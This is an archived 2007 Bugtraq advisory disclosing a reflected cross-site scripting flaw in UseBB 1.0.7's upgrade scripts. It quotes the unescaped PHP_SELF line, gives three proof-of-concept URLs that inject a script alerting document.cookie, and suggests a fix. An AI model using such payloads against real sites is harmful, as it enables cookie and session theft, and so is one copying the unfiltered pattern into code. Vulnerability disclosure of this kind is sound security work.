UseBB 1.0.x Cross Site Scripting (XSS)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: UseBB 1.0.x Cross Site Scripting (XSS)
From: s4mi@xxxxxxxxxxxxx
Date: 20 Jul 2007 19:54:36 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#############################################################
#       Script...............: UseBB version: 1.0.7         #
#       Script Site..........: http://www.usebb.net         #
#       Vulnerability........: Cross Site Scripting (XSS)   #
#       Acces................: Remote                       #
#       level................: Dangerous                    #
#       Author...............: S4mi                         #
#       Contact..............: s4mi[at]LinuxMail.org        #
#############################################################

The affected Files :
====================
/UseBB/install/upgrade-0-2-3.php
/UseBB/install/upgrade-0-3.php
/UseBB/install/upgrade-0-4.php

vuln Code: line ~ 86
=====================
[code]
return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input 
type="hidden" 
name="step" value="'.$step.'" /><input type="submit" value="' . ( ( 
$_POST['step'] == $step ) ? 'Retry step 
'.$step : 'Continue to step '.$step ) . '" /></p></form>';
[/code]

The variables PHP_SELF is used without filtering

PoC :
====================
http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/";><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-3.php/";><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-4.php/";><ScRiPt>alert(document.cookie);</ScRiPt>

Solution :
====================

filtre the PHP_SELF
or you know what's the best lool : Delete the Install directory :D

Shoutz :
====================
Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r 
....... & all Others

Prev by Date: FLEA-2007-0032-1: flashplayer
Next by Date: Re: Internet Explorer 0day exploit
Previous by thread: FLEA-2007-0032-1: flashplayer
Next by thread: 2007-07-20 - n.runs-SA-2007.019 - Panda Antivirus EXE parsing Arbitrary Code Execution Advisory
Index(es):
- Date
- Thread